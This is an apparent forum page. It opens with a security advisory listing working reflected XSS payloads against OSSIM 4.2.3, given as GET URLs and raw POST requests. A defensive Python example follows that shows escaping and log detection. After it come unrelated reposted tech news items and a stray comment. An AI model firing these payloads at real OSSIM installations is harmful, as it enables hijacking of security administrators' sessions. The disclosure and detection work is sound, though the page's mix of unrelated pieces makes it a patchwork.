-------------------
AlienVault's open source SIEM project, OSSIM, created in 2003, is the most widely used SIEM offering with over 195,000 downloads in 175 countries. OSSIM provides all of the features that a security professional needs from a SIEM offering event collection, normalization, and correlation. Established and launched by security engineers out of necessity, OSSIM was created with an understanding of the reality many security professionals face: a SIEM is useless without the basic security controls necessary for security visibility. OSSIM addresses this reality by providing the essential security capabilities built into a unified platform. Standing on the shoulders of the many proven open source security controls built into the platform, OSSIM continues to be the fastest way to make the first steps towards unified security visibility. AlienVault provides ongoing development for OSSIM because we believe that everyone should have access to sophisticated security technologies; this includes the researchers who need a platform for experimentation, and the unsung heroes who can't convince their companies that security is a problem.

Vulnerability Details:
----------------------
OSSIM 4.2.3 and lower is vulnerable to multiple reflected cross site scripting (XSS) vulnerabilities. The PHP code does seem to sanitize a lot of input to protect against XSS/SQLi/etc. such as disallowing <script> code tags. However, it's possible to inject <img src=a onerror=[javascriptcode]> to execute javascript code on the client browser. Below are the reflected XSS vulnerabilities.

[ 0x01 - Reflected XSS GET ]

https:// <IP>/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E
https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="><img%20src%3da%20onerror%3dalert('XSS')>
https:// <IP>/ossim/av_inventory/task_edit.php?section="><img%20src%3da%20onerror%3dalert('XSS')>
https:// <IP>/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=<img%20src%3da%20onerror%3dalert('XSS')>

[ 0x02 - Reflected XSS POST request #1 ]

POST /ossim/vulnmeter/simulate.php HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
Content-Length: 72
Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=<img%20src%3da%20onerror%3dalert('XSS')>&targets=blah

[ 0x03 - Reflected XSS POST request #2 ]

POST /ossim/vulnmeter/simulate.php HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https:// <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
Content-Length: 72
Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=Null&targets=blah<img%20src%3da%20onerror%3dalert('XSS')>
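As an added example (not the advisory's or AlienVault's code), the Python below imitates the blocklist filter the advisory describes, shows that attribute-context escaping closes the hole, and scans constructed access-log lines for the payload shape; the sanitizer, the reflected markup and the log lines are all assumptions.

```python
"""Blocklist filtering vs. context-aware escaping for the reflected XSS above,
plus an access-log scan for the payload shape. Constructed example throughout."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Payload shape from the advisory: <script> is stripped, an <img> with an
# onerror handler is not.
ADVISORY_PAYLOAD = "\"><img src=a onerror=alert('XSS')>"

# 1. Imitation of a blocklist sanitizer (constructed; not OSSIM's real code).
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.I)


def blocklist_sanitize(value):
    """Remove <script> tags only: the behaviour the advisory describes."""
    return SCRIPT_TAG.sub("", value)


def render_blocklist(param):
    """Reflect a parameter into an attribute after blocklist filtering (vulnerable)."""
    return f'<input type="hidden" name="withoutmenu" value="{blocklist_sanitize(param)}">'


def render_escaped(param):
    """Fix: escape for the HTML attribute context, quotes included."""
    return f'<input type="hidden" name="withoutmenu" value="{html.escape(param, quote=True)}">'


# 2. Judge the rendered output by parsing it, not by grepping it: an escaped
# value still *contains* the text "onerror=", but only inside an attribute.
class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def injected_tags(rendered):
    """Return tags other than the intended <input>, or any tag with an on* handler."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [(tag, attrs) for tag, attrs in parser.tags
            if tag != "input" or any(k.startswith("on") for k in attrs)]


# 3. Access-log scan: decoded query values that look like a tag with an event
# handler or a script tag. This covers the GET cases (0x01); the POST-body
# cases (0x02, 0x03) need application or WAF logging, since request bodies
# never reach the access log.
PAYLOAD_SHAPE = re.compile(r"<\s*\w+[^>]*\son\w+\s*=|<\s*script\b", re.I)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def suspicious_requests(log_lines):
    """Return (client_ip, path, parameter) for query values matching PAYLOAD_SHAPE."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            if any(PAYLOAD_SHAPE.search(v) for v in values):
                hits.append((line.split(" ", 1)[0], parts.path, name))
    return hits


# Constructed access-log lines in Apache combined style (placeholder addresses).
SAMPLE_LOG = [
    '192.0.2.7 - - [25/Jul/2013:10:00:00 +0000] "GET /ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E HTTP/1.1" 200 5120',
    '192.0.2.7 - - [25/Jul/2013:10:00:03 +0000] "GET /ossim/av_inventory/task_edit.php?section=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E HTTP/1.1" 200 3310',
    '198.51.100.4 - - [25/Jul/2013:10:01:10 +0000] "GET /ossim/vulnmeter/index.php?withoutmenu=1 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [25/Jul/2013:10:01:12 +0000] "POST /ossim/vulnmeter/simulate.php HTTP/1.1" 200 210',
]

if __name__ == "__main__":
    print("blocklist:", injected_tags(render_blocklist(ADVISORY_PAYLOAD)))
    print("escaped:  ", injected_tags(render_escaped(ADVISORY_PAYLOAD)))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```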
  19. Police in the Chiba Prefectural zone of Japan have arrested nine people suspected of making nearly $4m by distributing malware that harvested mobile users' contact information and using it for a fake dating website. The arrests came after a joint operation between the police and Symantec, and the security company reports that the possible ringleader of the group is Masaaki Kagawa, president of IT firm Koei Planning and a semi-professional poker player who has netted over $1.5m in winnings from tournament play in the last six years. Since 2007 he's competed in a variety of games on the international poker circuit in London, Las Vegas, Monte Carlo, and Australia, with some success and the occasional massive loss. If convicted, however, Kagawa won't be playing high-stakes poker for some time to come. Kagawa and his associates are accused of using a wide variety of applications to spread the Android malware, Enesoluty, across third-party Android apps forums via 150 hosted domains. The malware harvested the email addresses of its victims, and it seems these were used to drive traffic to a phony dating website. Those who signed up for the dating site would be bombarded by messages from "people" wanting to talk with them, at the price of conversation tokens. A few people with multiple personas would encourage ever-longer conversations with no chance of meeting a flesh-and-blood date. "The mobile malware was just a step towards his real scheme which was to send out spam about his dating site and get people to sign up over there and not really get any service," Vikram Thakur, principal research manager at Symantec Security Response, told The Register. "By getting signups is where he made his money, but that's not to say that he didn't also sell the contact information on to spammers and the like," Thakur said. 
From the looks of some of the applications the malware distributors were pushing, they will have scooped the dumbest of users, so the email lists would have been perfect for psychics and pitchers of other such wondrous illogicalities. One application promised to turn the screen of the smartphone into a solar cell that would charge up the handset, while another app let users jiggle the breasts of a cartoon figure. In all cases, the infected application asked for contact details, despite there being no logical need for such data. "There's a sucker born every minute," the American scammer PT Barnum is reported to have said – and based on the gang's results he was right. These lamentable apps harvested 37 million email addresses from around 810,000 Android devices. Researchers at Symantec started picking up infections from Enesoluty in September last year and began analyzing the code. Thakur said it became clear that the malware didn't come from one of the many automatic malware generating kits available online, but was being written specifically by a group of programmers to harvest contact details. Further examination of the code showed details of where the purloined contact details were being routed through, and Symantec contacted the local police to see if the culprits could be caught. Thakur said the local police were "very switched-on" when it comes to this kind of crime. Maybe US investigators could get some tips from them. ® Source: TheRegister.co.uk
  20. Microsoft has released a developer preview build of Internet Explorer 11 for Windows 7, breaking a pattern of dragging its feet when it comes to supporting the latest version of IE on the older OS. After shipping IE10 with Windows 8, Redmond took over a year to release a preview version that ran on Windows 7, and another three months after that to ship the final version. This, despite the fact that most other software could run on either OS without a hitch. This time, Microsoft has offered up a Windows 7–compatible version of IE11 before the browser has technically even been released. The only way to get IE11 so far has been to install the Windows 8.1 Preview, which itself is still around a month away from shipping to OEMs. That won't be an acceptable solution for many developers, because Microsoft has warned that anyone who installed the Windows 8.1 Preview will need to re-install all of their applications after they upgrade to the final version. In a blog post on Thursday, group program managers Sandeep Singhal and Rob Mauceri of Microsoft's Internet Explorer team said the Windows 7 version of the browser gives users of the older OS "all of the performance, security, and under-the-hood changes that enable a compatible Web experience," which is virtually a cut-and-paste of what they said about the Windows 7 version of IE10 last November. The pair go on to extol the various virtues of Microsoft's latest browser, including improved JavaScript performance, hardware-accelerated graphics processing, support for new W3C standards, improved responsiveness on touch devices, and redesigned developer tools. Coinciding with the release of the IE11 preview build, Microsoft has upgraded its modern.IE web developer tools to work with the new browser by expanding its gallery of free, downloadable virtual machine images with images of IE11 running on Windows 7 and Windows 8.1 Preview. 
In addition, Microsoft is offering 25 per cent off Parallels Desktop 8 for Mac, to make it easier for OS X users to test their sites on IE. Your Reg hack couldn't help but notice one glaring omission, however. While Redmond seems intent on delivering a version of IE11 for Windows 7, Windows 8 is notably absent from any discussion of the new browser. In fact, attempting to install the IE11 preview on a stock Windows 8 machine without the Windows 8.1 Preview installed yields the following paradoxical error message: From the look of it, the only way to get IE11 running on Windows 8 will be to install the Windows 8.1 update when it eventually ships. It seems that when Steve Ballmer announced Microsoft's new rapid release cadence, he really meant it, and we're all expected to come along for the ride if we want the latest versions of tools like Internet Explorer. The IE11 preview for Windows 7 is available for download from Microsoft's Internet Explorer site beginning on Thursday. ® Source: TheRegister.co.uk
  21. The Wikimedia Foundation has flicked the switch on its mobile editing feature, allowing anyone with an account to edit Wikipedia articles on just about any mobile device capable of rendering HTML. The Foundation's aim is not to help you fill time during your commute. Instead, it says the new feature's been developed because it “... had to do more to let anyone with Internet access contribute to the sum of all human knowledge.” The 15 per cent of Wikipedia users who currently access the site on mobile devices are the “anyone” of special interest on this occasion, because the Foundation is assuming they may not also have a PC with which to edit the encyclopaedia. That's a not-unreasonable assumption based on our piece from yesterday about adoption of mobile devices in the developing world. The editor is simple to access: articles now include the pencil icon you can see in the screen shot below, captured in Chrome on a Samsung Galaxy S4. Clicking on that icon produces a very simple editor that reproduces a Wikipedia article in text with the option to use a few markup tags. Tapping inside the editing field invoked the handset's virtual keyboard, at which point the usual fat-fingered typing fun begins. The editor does not offer a stellar experience and our brief experiments with it suggest typos will be hard to avoid, but the Foundation says it didn't want to go for lots of bells and whistles in its first release. The post announcing the new feature offers the following logic: “For our first release, our primary goal was to create a fast, intuitive editing experience for new users and experienced editors alike, while still sticking with markup editing for now. 
We started simple so we could observe our users’ needs and expectations.” It's hoped that observing users wrangle this editor will let the Foundation “... learn more about the kinds of edits people make on mobile” so it can “build more advanced features, including possible Visual Editor integration, in future releases.” Source: TheRegister.co.uk
  22. Sysadmin blog Today, this very Friday, is Sysadmin Day. As a system administrator, I'm naturally biased and think every day should be sysadmin day, but it's nice to know we have at least one day a year set aside for some recognition. What is really heartening to see is just how much awareness of the day has grown since its inception. As you might imagine, Sysadmin Day is not exactly an established cultural holiday. Sysadmin Day as it is celebrated today was started in 2000 by sysadmin Ted Kekatos, though various incarnations of it have existed since at least the 1960s. It was Kekatos that managed to bring the many informal celebrations together into one day and convince an ever increasing percentage of the world to set aside the last Friday of July. I remember first hearing about Sysadmin Day in July 2000; I'd missed the event proper, but was quite happy that it existed. I'd just graduated from high school and everyone in my life was shooing me in the direction of the local computer-science programme. Having just finished up a lifetime's course in schoolyard bullying for being "the nerd" I found the idea that maybe someone might appreciate computer types to be more than a little comforting. Of course, reality was somewhat different. Sysadmin Day was largely a tongue-in-cheek celebration observed only within the nerdosphere and unheard of by bosses, coworkers and so forth. It took a decade of spreading the word before this became an accepted thing – on a par with Secretaries Day in North America – at most of the workplaces I frequent. In much of the world, there is still a lot of work to do to gain any form of real recognition.
I'm a real boy!
Despite the sometimes uphill battle for notice I still feel that the day adds an air of legitimacy to our craft. 
Somehow, knowing that millions of people around the world celebrate systems administrators as important contributors to the workforce makes me feel less like we're the new kids on the block and more like we're an actual established profession. Professional associations have existed in IT for decades. CIPS – Canada's Association of IT Professionals – was founded in 1958 and offers an "Information Systems Professional" designation that is recognized in Canadian law. Legally speaking, obtaining that designation makes a sysadmin a professional no different in the eyes of Canadian law than a doctor, lawyer or certified accountant. Other countries have similar programmes, though recognition in law varies wildly by country. The Americans have ICCP while the Brits have the British Computer Society. While legal recognition of the importance of our craft certainly helps, public recognition and acceptance of sysadmins is still often questionable at best. Maybe it's the 16-year-old me still stuck deep down in my psyche, but "happy sysadmin day" once a year makes me feel just that little bit more normal.
Party hard, chat to fellow sysadmins
Growing mainstream acceptance of Sysadmin Day has led to an increased number of celebrations the world over. More companies than I can keep track of now either capitalise on the event for marketing, genuinely try to give something back to the sysadmin community, or both. I've put together a webinar with prizes for the sysadmins who can come up with the best question to stump our panel of "flash in the enterprise" experts. This is happening today (Friday) at 1.30pm Mountain Daylight Time (GMT -6) – sign up here – and we've even had a new company ServerAssist toss five 20-server licensing packs into the prize pool. Sysadmins, whether you are participating in any of the many contests, promotions or what-have-you that litter Sysadmin Day or not, I do hope you take the time out to enjoy your day. 
Ours is a largely thankless job and you deserve at least one day. For the rest, I hope you've a party planned for your sysadmins. Or that you'll say "happy sysadmin day". At the very least, smile at them and say "hi". Who knows, it might be a rare enough event that something that simple will make their (sysadmin) day. ® Source: TheRegister.co.uk
  23. This week's Spanish train disaster, in which at least 80 people were killed after a speeding train derailed, is being exploited by internet pondlife to spread malware. Security outfit Dynamoo spotted email spam that links to what's claimed to be a CNN news story. Marks who click the URL end up on a hacked website riddled with malware to infect the passing web surfer. The ruse is crude. More sophisticated scams that rely on manipulating search engine results, possibly referencing CCTV footage (see below) of the inter-city train coming off the tracks near Santiago de Compostela in Galicia, are likely to follow. Back in the real world, Spain is mourning the deaths of 80 people in Wednesday evening's disaster, while 90 seriously injured passengers are being treated in hospitals. Any major story, ranging from natural disaster to celebrity deaths, is liable to become the theme of malware-based scams. In the case of human tragedy or natural disaster these are sometimes followed up with fake donation sites designed to enrich scumbags rather than help genuine victims. Earlier this week we predicted the birth of the first child to the Duke and Duchess of Cambridge was likely to become a theme of such scams. Sure enough, Prince George's arrival into the world was heralded by malware-flinging scams. Spam emails supposedly from ScribbleLive with the subject “The Royal Baby: Live Updates” lead to sites loaded with the Blackhole Exploit Kit, designed to exploit vulnerabilities and push the infamous Zeus banking Trojan, Threat Track Security reports. Malicious attachments in the form of Windows SCR files in scam emails about the royal birth have already been spotted doing the rounds. The royal baby, like the Spanish train crash, and other significant news stories such as a Barack Obama speech on the US economy and more have all become the themes of fake CNN news story malware scams this week, security firm AppRiver reports. ® Source: TheRegister.co.uk
  24. Stanford University is asking users to reset their passwords following the discovery of an attack that has left users and staff vulnerable to potential identity theft. “Stanford treats information security with the utmost seriousness and is continually upgrading its defenses against cyber attacks,” the university said. “Like many institutions, the university repels millions of attempted attacks on its information systems each day. In recent months, a range of large organisations have also reported attacks involving their information systems.” The company is currently unable to provide details on the scope and range of the attack, though the breach is believed to be confined to the university's campus and is related to a series of security breaches on US companies. A hallmark of the US education system, Stanford has emerged as a top source of information technology entrepreneurs in Silicon Valley. The university has produced technology leaders including Sergei Brin, Jerry Yang and Larry Page among others. The hack comes in the wake of numerous other high profile data thefts and password breaches at numerous firms. Earlier this week UK retailer Lakeland admitted hackers had accessed two databases, forcing the firm to reset all user passwords. In response the government has issued letters to the top FTSE 350 companies offering them the chance for a free cyber security audit against their peers to see how they are performing. Source: V3.co.uk
  25. It can't be 1/4, because two of the answers are the same. So 2/4. // I've just seen that you edited it.